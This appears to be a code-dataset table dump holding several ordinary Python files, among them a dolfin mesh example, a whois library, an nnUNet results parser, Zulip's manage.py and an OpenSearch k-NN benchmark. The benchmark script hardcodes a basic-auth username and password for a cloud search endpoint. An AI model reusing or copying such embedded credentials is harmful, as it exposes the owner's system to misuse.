hexsha (stringlengths 40-40) | size (int64 5-1.03M) | ext (stringclasses 9 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 3-241) | max_stars_repo_name (stringlengths 5-125) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (sequencelengths 1-10) | max_stars_count (int64 1-208k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 3-241) | max_issues_repo_name (stringlengths 5-125) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (sequencelengths 1-10) | max_issues_count (int64 1-116k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 3-241) | max_forks_repo_name (stringlengths 5-125) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (sequencelengths 1-10) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | content (stringlengths 5-1.03M) | avg_line_length (float64 1.5-756k) | max_line_length (int64 4-869k) | alphanum_fraction (float64 0.01-0.98) | count_classes (int64 0-3.38k) | score_classes (float64 0-0.01) | count_generators (int64 0-832) | score_generators (float64 0-0) | count_decorators (int64 0-2.75k) | score_decorators (float64 0-0) | count_async_functions (int64 0-623) | score_async_functions (float64 0-0) | count_documentation (int64 3-581k) | score_documentation (float64 0.4-0.6) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
16e8783047883ecc17068c1f63c87b161a271a5f | 1,054 | py | Python | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | ["MIT"] | 4 | 2020-07-30T02:38:29.000Z | 2021-09-12T14:30:18.000Z | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | ["MIT"] | null | null | null | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | ["MIT"] | null | null | null |
'''
compute_collisions() computes the collisions of all the entities with
a Point, while compute_first_entity_collision() returns only the first one.
This can be tricky, especially if the point lies exactly on an element edge.
You may also want to compare with the Cell.contains(Point) tool.
'''
# Script by Rudy at https://fenicsproject.discourse.group/t/
# any-function-to-determine-if-the-point-is-in-the-mesh/275/3
import dolfin
from vtkplotter.dolfin import shapes, plot, printc
n = 4
Px = 0.5
Py = 0.5
mesh = dolfin.UnitSquareMesh(n, n)
bbt = mesh.bounding_box_tree()
collisions = bbt.compute_collisions(dolfin.Point(Px, Py))
collisions1st = bbt.compute_first_entity_collision(dolfin.Point(Px, Py))
printc("collisions : ", collisions)
printc("collisions 1st: ", collisions1st)
for cell in dolfin.cells(mesh):
contains = cell.contains(dolfin.Point(Px, Py))
printc("Cell", cell.index(), "contains P:", contains, c=contains)
###########################################
pt = shapes.Point([Px, Py], c='blue')
plot(mesh, pt, text=__doc__)
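# A minimal point-in-mesh helper built on the same calls (a sketch, not part
# of the original example). It assumes dolfin's convention that
# compute_first_entity_collision() returns an out-of-range index (>= number
# of cells) when nothing is hit.
def point_in_mesh(mesh, x, y):
    tree = mesh.bounding_box_tree()
    cell_id = tree.compute_first_entity_collision(dolfin.Point(x, y))
    return cell_id < mesh.num_cells()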
| 35.133333 | 75 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 519 | 0.49241 |
16e89821c774aa40fe5b74ea387488fc99280078 | 7,309 | py | Python | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | ["Apache-2.0"] | 1 | 2021-11-16T13:22:09.000Z | 2021-11-16T13:22:09.000Z | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | ["Apache-2.0"] | null | null | null | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | ["Apache-2.0"] | null | null | null |
# https://medium.com/@kumon/how-to-realize-similarity-search-with-elasticsearch-3dd5641b9adb
# https://docs.aws.amazon.com/opensearch-service/latest/developerguide/knn.html
import sys
import requests
import h5py
import numpy as np
import json
import aiohttp
import asyncio
import time
import httpx
from requests.auth import HTTPBasicAuth
from statistics import mean
# if len(sys.argv) != 2:
# print("Type in the efSearch!")
# sys.exit()
# path = '/tmp/sift-128-euclidean.hdf5.1M' # float dataset
# path = '/tmp/sift-128-euclidean.hdf5' # float dataset
path = '/home/ubuntu/sift-128-euclidean.hdf5' # float dataset
output_csv = '/tmp/sift-es.csv'
# url = 'http://127.0.0.1:9200/sift-index/'
host = 'https://vpc-....ap-southeast-1.es.amazonaws.com/' # single node
# host = 'https://vpc-....ap-southeast-1.es.amazonaws.com/' # two nodes
url = host + 'sift-index/'
requestHeaders = {'content-type': 'application/json'} # https://stackoverflow.com/questions/51378099/content-type-header-not-supported
auth = HTTPBasicAuth('admin', 'I#vu7bTAHB')
# Build an index
#https://stackoverflow.com/questions/17301938/making-a-request-to-a-restful-api-using-python
# PUT sift-index
data = '''{
"settings": {
"index": {
"knn": true,
"knn.space_type": "l2",
"knn.algo_param.m": 6,
"knn.algo_param.ef_construction": 50,
"knn.algo_param.ef_search": 50,
"refresh_interval": -1,
"translog.flush_threshold_size": "10gb",
"number_of_replicas": 0
}
},
"mappings": {
"properties": {
"sift_vector": {
"type": "knn_vector",
"dimension": 128
}
}
}
}'''
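# For orientation (general HNSW behaviour, not something this script verifies):
# `m` is the number of graph links per node, `ef_construction` the candidate
# list size while building the graph, and `ef_search` the candidate list size
# at query time; larger values trade speed and memory for recall.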
# https://medium.com/@kumon/how-to-realize-similarity-search-with-elasticsearch-3dd5641b9adb
response = requests.put(url, data=data, headers=requestHeaders, auth=auth)
# response = requests.put(url, data=data, verify=False, headers=requestHeaders, auth=auth)
assert response.status_code==requests.codes.ok
# cluster_url = 'http://127.0.0.1:9200/_cluster/settings'
cluster_url = host + '_cluster/settings'
cluster_data = '''{
"persistent" : {
"knn.algo_param.index_thread_qty": 16
}
}
'''
response = requests.put(cluster_url, data=cluster_data, auth=auth, headers=requestHeaders)
assert response.status_code==requests.codes.ok
# Bulkload into index
bulk_template = '{ "index": { "_index": "sift-index", "_id": "%s" } }\n{ "sift_vector": [%s] }\n'
hf = h5py.File(path, 'r')
for key in hf.keys():
print("A key of hf is %s" % key) #Names of the groups in HDF5 file.
vectors = np.array(hf["train"][:])
num_vectors, dim = vectors.shape
print("num_vectors: %d" % num_vectors)
print("dim: %d" % dim)
bulk_data = ""
start = time.time()
for (id,vector) in enumerate(vectors):
assert len(vector)==dim
vector_str = ""
for num in vector:
vector_str += str(num) + ','
vector_str = vector_str[:-1]
id_str = str(id)
single_bulk_done = bulk_template % (id_str, vector_str)
bulk_data += single_bulk_done
if (id+1) % 100000 == 0:
print(str(id+1))
# POST _bulk
    response = requests.put(url + '_bulk', data=bulk_data, auth=auth, headers=requestHeaders)
assert response.status_code==requests.codes.ok
bulk_data = ""
end = time.time()
print("Insert Time: %d mins" % ((end - start) / 60.0)) # Unit: min
# refresh_url = 'http://127.0.0.1:9200/sift-index/_settings'
refresh_url = host + 'sift-index/_settings'
refresh_data = '''{
"index" : {
"refresh_interval": "1s"
}
}
'''
response = requests.put(refresh_url, data=refresh_data, headers=requestHeaders, auth=auth)
assert response.status_code==requests.codes.ok
# response = requests.post('http://127.0.0.1:9200/sift-index/_refresh', verify=False, headers=requestHeaders)
# assert response.status_code==requests.codes.ok
# merge_url = 'http://127.0.0.1:9200/sift-index/_forcemerge?max_num_segments=1'
merge_url = host + 'sift-index/_forcemerge?max_num_segments=1'
merge_response = requests.post(merge_url, headers=requestHeaders, auth=auth, timeout=600)
assert merge_response.status_code==requests.codes.ok
# warmup_url = 'http://127.0.0.1:9200/_opendistro/_knn/warmup/sift-index'
warmup_url = host + '_opendistro/_knn/warmup/sift-index'
warmup_response = requests.get(warmup_url, headers=requestHeaders, auth=auth)
assert warmup_response.status_code==requests.codes.ok
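# Optional sanity check (a sketch, not in the original script): confirm the
# force-merge above actually reduced the index to one segment per shard via
# the standard _cat/segments API.
segments_response = requests.get(host + '_cat/segments/sift-index?format=json', headers=requestHeaders, auth=auth)
assert segments_response.status_code==requests.codes.ok
print("segment count: %d" % len(json.loads(segments_response.text)))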
# Send queries
total_time = 0 # in ms
hits = 0 # for recall calculation
query_template = '''
{
"size": 50,
"query": {"knn": {"sift_vector": {"vector": [%s],"k": 50}}}
}
'''
queries = np.array(hf["test"][:])
nq = len(queries)
neighbors = np.array(hf["neighbors"][:])
# distances = np.array(hf["distances"][:])
num_queries, q_dim = queries.shape
print("num_queries: %d" % num_queries)
print("q_dim: %d" % q_dim)
assert q_dim==dim
ef_search_list = [50, 100, 150, 200, 250, 300]
for ef_search in ef_search_list:
ef_data = '''{
"index": {
"knn.algo_param.ef_search": %d
}
}'''
ef_data = ef_data % ef_search
### Update Index Setting: efSearch
  response = requests.put(url + '_settings', data=ef_data, headers=requestHeaders, auth=auth)
assert response.status_code==requests.codes.ok
total_time_list = []
hits_list = []
for count in range(5):
total_time = 0 # in ms
hits = 0 # for recall calculation
query_template = '''
'''
single_query = '''{}\n{"size": 50, "query": {"knn": {"sift_vector": {"vector": [%s],"k": 50}}}}\n'''
for (id,query) in enumerate(queries):
assert len(query)==dim
query_str = ""
for num in query:
query_str += str(num) + ','
query_str = query_str[:-1]
# GET sift-index/_search
single_query_done = single_query % (query_str)
query_template += single_query_done
query_data = query_template
# print(query_data)
    response = requests.get(url + '_msearch', data=query_data, headers=requestHeaders, auth=auth, stream=True)
assert response.status_code==requests.codes.ok
# print(response.text)
result = json.loads(response.text)
# QPS
total_time = result['took']
# tooks = []
# for i in range(len(queries)):
# for ele in result['responses']:
# tooks.append(int(ele['took']))
for id in range(len(queries)):
# Recall
neighbor_id_from_result = []
for ele in result['responses'][id]['hits']['hits']:
neighbor_id_from_result.append(int(ele['_id']))
assert len(neighbor_id_from_result)==50
# print("neighbor_id_from_result: ")
# print(neighbor_id_from_result)
neighbor_id_gt = neighbors[id][0:50] # topK=50
# print("neighbor_id_gt")
# print(neighbor_id_gt)
hits_q = len(list(set(neighbor_id_from_result) & set(neighbor_id_gt)))
# print("# hits of this query with topk=50: %d" % hits_q)
hits += hits_q
total_time_list.append(total_time)
hits_list.append(hits)
print(total_time_list)
  # average the middle runs, dropping the first two (warm-up) and the last one
  total_time_avg = mean(total_time_list[2:-1])
hits_avg = mean(hits_list)
QPS = 1.0 * nq / (total_time_avg / 1000.0)
recall = 1.0 * hits_avg / (nq * 50)
print(ef_search, QPS, recall)
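# A standalone sketch (not in the original script) of the metric computed
# inline above: mean recall@k over all queries, from lists of retrieved ids
# and ground-truth ids.
def recall_at_k(retrieved_ids, ground_truth_ids, k=50):
    hit_count = sum(len(set(r[:k]) & set(g[:k])) for r, g in zip(retrieved_ids, ground_truth_ids))
    return hit_count / float(len(ground_truth_ids) * k)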
| 33.374429 | 142 | 0.675332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,478 | 0.475852 |
16ea2d8be166b5650aea4af33dbde9040a41f768 | 1,438 | py | Python | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | ["BSD-2-Clause"] | null | null | null | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | ["BSD-2-Clause"] | null | null | null | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | ["BSD-2-Clause"] | null | null | null |
import platform
import textwrap
import pytest
from . import test_projects, utils
dockcross_only_project = test_projects.new_c_project(
setup_py_add=textwrap.dedent(r'''
import os, sys
# check that we're running in the correct docker image as specified in the
# environment options CIBW_MANYLINUX1_*_IMAGE
if "linux" in sys.platform and not os.path.exists("/dockcross"):
raise Exception(
"/dockcross directory not found. Is this test running in the correct docker image?"
)
''')
)
def test(tmp_path):
if utils.platform != 'linux':
pytest.skip('the test is only relevant to the linux build')
if platform.machine() not in ['x86_64', 'i686']:
pytest.skip('this test is currently only possible on x86_64/i686 due to availability of alternative images')
project_dir = tmp_path / 'project'
dockcross_only_project.generate(project_dir)
actual_wheels = utils.cibuildwheel_run(project_dir, add_env={
'CIBW_MANYLINUX_X86_64_IMAGE': 'dockcross/manylinux2010-x64',
'CIBW_MANYLINUX_I686_IMAGE': 'dockcross/manylinux2010-x86',
'CIBW_SKIP': 'pp* cp39-*',
})
# also check that we got the right wheels built
expected_wheels = [w for w in utils.expected_wheels('spam', '0.1.0')
if '-pp' not in w and '-cp39-' not in w]
assert set(actual_wheels) == set(expected_wheels)
| 35.073171 | 116 | 0.672462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 770 | 0.535466 |
bc447d214c0f2c389991fd5918f6f13fed4aaf6b | 634 | py | Python | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | ["MIT"] | null | null | null | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | ["MIT"] | null | null | null | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | ["MIT"] | null | null | null |
"""A simple file to test the line_counter performance in python
This is a multiline doctest
"""
__author__ = "Frederico Moeller"
__copyright__ = ""
__credits__ = ["Frederico Moeller"]
__license__ = "MIT"
__version__ = "1.0.1"
__maintainer__ = "Frederico Moeller"
__email__ = ""
__status__ = ""
#import things
import math
#define things
def some_function(var_one, var_two,
var_three):
"""This is a function that do things"""
if var_one > var_two:
if var_two*var_three > var_one:
return "blab" #this happens
else:
return "blob"
else:
return "fish"
| 21.133333 | 63 | 0.641956 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 268 | 0.422713 |
bc44f25c8ff96beccbbd3fbaa05ae2dcf6790cc6 | 576 | py | Python | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | ["MIT"] | null | null | null | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | ["MIT"] | null | null | null | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | ["MIT"] | null | null | null |
# Take number, and convert integer to string
# Calculate and return number of digits
def get_num_digits(num):
# Convert int to str
num_str = str(num)
# Calculate number of digits
digits = len(num_str)
return digits
# Define main function
def main():
# Prompt user for an integer
number = int(input('Enter an integer: '))
# Obtain number of digits
num_digits = get_num_digits(number)
# Display result
print(f'The number of digits in number {number} is {num_digits}.')
# Call main function
main()
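# Note, as a sketch beyond the original: str() keeps the minus sign, so
# get_num_digits(-12) would report 3. Taking abs() first counts digits only:
def get_num_digits_signed(num):
    return len(str(abs(num)))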
| 20.571429 | 70 | 0.647569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.557292 |
bc450f5f688b95fda7b269a4ca568c7ecc5143ca | 4,992 | py | Python | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | ["MIT"] | null | null | null | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | ["MIT"] | null | null | null | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import *
import re
import sys
import os
import subprocess
import socket
from .parser import WhoisEntry
from .whois import NICClient
# thanks to https://www.regextester.com/104038
IPV4_OR_V6 = re.compile(r"((^\s*((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\s*$)|(^\s*((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))(%.+)?\s*$))")
def whois(url, command=False, flags=0):
# clean domain to expose netloc
ip_match = IPV4_OR_V6.match(url)
if ip_match:
domain = url
try:
result = socket.gethostbyaddr(url)
        except socket.herror:
            pass  # reverse DNS lookup failed; keep the raw IP as the domain
else:
domain = extract_domain(result[0])
else:
domain = extract_domain(url)
if command:
# try native whois command
r = subprocess.Popen(['whois', domain], stdout=subprocess.PIPE)
text = r.stdout.read().decode()
else:
# try builtin client
nic_client = NICClient()
text = nic_client.whois_lookup(None, domain.encode('idna'), flags)
return WhoisEntry.load(domain, text)
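# Minimal usage sketch (relies only on the behaviour shown above):
#   whois("https://www.google.com/")  -> WhoisEntry for google.com
#   whois("8.8.8.8")                  -> reverse-resolves the IP, then queries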
suffixes = None
def extract_domain(url):
"""Extract the domain from the given URL
>>> print(extract_domain('http://www.google.com.au/tos.html'))
google.com.au
>>> print(extract_domain('abc.def.com'))
def.com
>>> print(extract_domain(u'www.公司.hk'))
公司.hk
>>> print(extract_domain('chambagri.fr'))
chambagri.fr
>>> print(extract_domain('www.webscraping.com'))
webscraping.com
>>> print(extract_domain('198.252.206.140'))
stackoverflow.com
>>> print(extract_domain('102.112.2O7.net'))
2o7.net
>>> print(extract_domain('globoesporte.globo.com'))
globo.com
>>> print(extract_domain('1-0-1-1-1-0-1-1-1-1-1-1-1-.0-0-0-0-0-0-0-0-0-0-0-0-0-10-0-0-0-0-0-0-0-0-0-0-0-0-0.info'))
0-0-0-0-0-0-0-0-0-0-0-0-0-10-0-0-0-0-0-0-0-0-0-0-0-0-0.info
>>> print(extract_domain('2607:f8b0:4006:802::200e'))
1e100.net
>>> print(extract_domain('172.217.3.110'))
1e100.net
"""
if IPV4_OR_V6.match(url):
# this is an IP address
return socket.gethostbyaddr(url)[0]
# load known TLD suffixes
global suffixes
if not suffixes:
# downloaded from https://publicsuffix.org/list/public_suffix_list.dat
tlds_path = os.path.join(os.getcwd(), os.path.dirname(__file__), 'data', 'public_suffix_list.dat')
with open(tlds_path, encoding='utf-8') as tlds_fp:
suffixes = set(line.encode('utf-8') for line in tlds_fp.read().splitlines() if line and not line.startswith('//'))
if not isinstance(url, str):
url = url.decode('utf-8')
url = re.sub('^.*://', '', url)
url = url.split('/')[0].lower()
# find the longest suffix match
domain = b''
split_url = url.split('.')
for section in reversed(split_url):
if domain:
domain = b'.' + domain
domain = section.encode('utf-8') + domain
if domain not in suffixes:
            if b'.' not in domain and len(split_url) >= 2:
# If this is the first section and there wasn't a match, try to
# match the first two sections - if that works, keep going
# See https://github.com/richardpenman/whois/issues/50
second_order_tld = '.'.join([split_url[-2], split_url[-1]])
if not second_order_tld.encode('utf-8') in suffixes:
break
else:
break
return domain.decode('utf-8')
if __name__ == '__main__':
try:
url = sys.argv[1]
except IndexError:
print('Usage: %s url' % sys.argv[0])
else:
print(whois(url))
| 42.305085 | 1,227 | 0.55629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,724 | 0.5448 |
bc4f5018d00b3586d20735c150c38e4b306f48f3 | 325 | py | Python | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | ["MIT"] | 7 | 2020-03-23T21:43:32.000Z | 2021-03-30T09:11:45.000Z | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | ["MIT"] | 4 | 2020-05-09T01:13:24.000Z | 2022-01-13T02:24:14.000Z | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | ["MIT"] | 4 | 2020-04-17T15:06:36.000Z | 2021-03-30T09:11:47.000Z |
'''
Created on Mar 22, 2020
@author: Michal.Busta at gmail.com
'''
#get rid of the optimizer state ...
import torch
MODEL_PATH = '/models/model-b2-2.pth'
state = torch.load(MODEL_PATH, map_location=lambda storage, loc: storage)
state_out = {
"state_dict": state["state_dict"],
}
torch.save(state_out, 'model-b2-2.pth')
| 20.3125 | 73 | 0.707692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.513846 |
bc4fb0ed6bbdc4f3f5e43225548f14915b084779 | 1,125 | py | Python | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | ["MIT"] | 6 | 2018-02-09T15:03:12.000Z | 2021-02-18T07:21:34.000Z | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | ["MIT"] | 17 | 2018-03-20T09:28:32.000Z | 2022-01-27T08:48:41.000Z | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | ["MIT"] | 7 | 2018-02-09T15:06:11.000Z | 2020-03-02T10:23:10.000Z |
import os
import re
from setuptools import setup
version = re.search(
'^__version__\s*=\s*"(.*)"',
open('braumeister/braumeister.py').read(),
re.M
).group(1)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="braumeister",
packages=["braumeister", "braumeister.actions"],
version=version,
author="Marcel Steffen",
author_email="marcel@talentsconnect.com",
description="Easy release bulding, combining JIRA and git",
long_description=read('README.md'),
license="MIT",
keywords="git jira release",
url="https://www.talentsconnect.com",
include_package_data=True,
install_requires=['requests', 'colorama'],
entry_points={
'console_scripts': ["braumeister = braumeister.braumeister:main"]
},
python_requires='!=2.7, !=3.4, >=3.5',
zip_safe=False,
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Topic :: Utilities",
"Topic :: Software Development :: Version Control :: Git"
],
)
| 26.162791 | 73 | 0.639111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 525 | 0.466667 |
bc5478846dead2384e17349d8f75968c543992de | 407 | py | Python | pkg/maths/maths.py | prateekdegaons1991/experiment-loadtest | b53c70fac5b2f7d37df77844b26f79741c74c1b6 | ["Apache-2.0"] | 8 | 2020-04-17T06:34:30.000Z | 2021-12-18T10:54:50.000Z | pkg/maths/maths.py | oumkale/test-python | 1f3d3e42ffbe1bf5ed9df8a0c6038e50129b2c4d | ["Apache-2.0"] | 15 | 2020-04-18T06:01:53.000Z | 2022-02-15T08:56:25.000Z | pkg/maths/maths.py | oumkale/test-python | 1f3d3e42ffbe1bf5ed9df8a0c6038e50129b2c4d | ["Apache-2.0"] | 12 | 2020-04-17T05:14:27.000Z | 2022-03-29T19:24:20.000Z |
#Atoi stands for ASCII to Integer Conversion
def atoi(string):
res = 0
# Iterate through all characters of
# input and update result
for i in range(len(string)):
res = res * 10 + (ord(string[i]) - ord('0'))
return res
#Adjustment applies the rule of three: given a value and a percentage, it returns that percentage of the value
def Adjustment(a, b):
return (a * b) / 100
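# Quick usage sketch (illustrative, not part of the original module):
#   atoi("123")         -> 123   (assumes a string of decimal digits only)
#   Adjustment(200, 25) -> 50.0  (25% of 200)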
| 27.133333 | 109 | 0.673219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.53317 |
bc6de8ef28a6c9ca4fc7727dee2d21bb765f85a1 | 1,585 | py | Python | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | ["MIT"] | null | null | null | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | ["MIT"] | null | null | null | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | ["MIT"] | null | null | null |
import json
import os
import nibabel as nib
import csv
from operator import itemgetter
# PATH TO PREPROCESSED DATA
raw_data_path = '/home/lab/nnUNet_data/nnUNet_raw_data_base/nnUNet_raw_data/Task500_BrainMets'
pixdim_ind = [1,2,3] # Indexes at which the voxel size [x,y,z] is stored
# PATH TO JSON FILE
with open('/home/lab/nnUNet_data/RESULTS_FOLDER/nnUNet/3d_fullres/Task500_BrainMets/nnUNetTrainerV2__nnUNetPlansv2.1/fold_4/validation_raw/summary.json') as file:
data = json.load(file)
with open('json_parsed.csv', mode='w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Case Number', 'Dice Score', 'Voxel Size-X', 'Voxel Size-Y', 'Voxel Size-Z'])
for img in data['results']['all']:
# Get dice score on image
dice = img['1']['Dice']
# Get nifti data on image
img_filename = (os.path.basename(img['reference']).split('.'))[0]
img_ni = nib.load(raw_data_path + '/imagesTr/' + img_filename + '_0000.nii.gz')
label_ni = nib.load(raw_data_path + '/labelsTr/' + img_filename + '.nii.gz')
voxel_size = itemgetter(*pixdim_ind)(img_ni.header["pixdim"])
# Get tumor dimensions
# tumor_size =
# Get case number corresponding to image
case_number = img_filename.split('_')[1]
# Write to csv file
        csv_writer.writerow([case_number, dice, voxel_size[0], voxel_size[1], voxel_size[2]])
| 36.860465 | 162 | 0.683281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 657 | 0.414511 |
bc7b31007719919e0de3183e896e2da210eb63a7 | 1,706 | py | Python | manage.py | isijara/zulip | 403f4dafcc71369f3b1143b9f7073cd5d76bf357 | ["Apache-2.0"] | 1 | 2019-04-14T20:31:55.000Z | 2019-04-14T20:31:55.000Z | manage.py | hcxiong/zulip | bf22eefedebd50b25f32b22988217c13a89b65d1 | ["Apache-2.0"] | 7 | 2020-09-06T14:54:30.000Z | 2022-02-10T18:51:14.000Z | manage.py | hcxiong/zulip | bf22eefedebd50b25f32b22988217c13a89b65d1 | ["Apache-2.0"] | 9 | 2019-11-04T18:59:29.000Z | 2022-03-22T17:46:37.000Z |
#!/usr/bin/env python3
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
import scripts.lib.setup_path_on_import
if __name__ == "__main__":
if 'posix' in os.name and os.geteuid() == 0:
print("manage.py should not be run as root. Use `su zulip` to drop root.")
sys.exit(1)
if (os.access('/etc/zulip/zulip.conf', os.R_OK) and not
os.access('/etc/zulip/zulip-secrets.conf', os.R_OK)):
# The best way to detect running manage.py as another user in
# production before importing anything that would require that
# access is to check for access to /etc/zulip/zulip.conf (in
# which case it's a production server, not a dev environment)
# and lack of access for /etc/zulip/zulip-secrets.conf (which
# should be only readable by root and zulip)
print("Error accessing Zulip secrets; manage.py in production must be run as the zulip user.")
sys.exit(1)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "zproject.settings")
from django.conf import settings
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from scripts.lib.zulip_tools import log_management_command
log_management_command(" ".join(sys.argv), settings.MANAGEMENT_LOG_PATH)
os.environ.setdefault("PYTHONSTARTUP", os.path.join(BASE_DIR, "scripts/lib/pythonrc.py"))
if "--no-traceback" not in sys.argv and len(sys.argv) > 1:
sys.argv.append("--traceback")
try:
execute_from_command_line(sys.argv)
except CommandError as e:
print(e, file=sys.stderr)
sys.exit(1)
| 42.65 | 102 | 0.694607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 712 | 0.417351 |
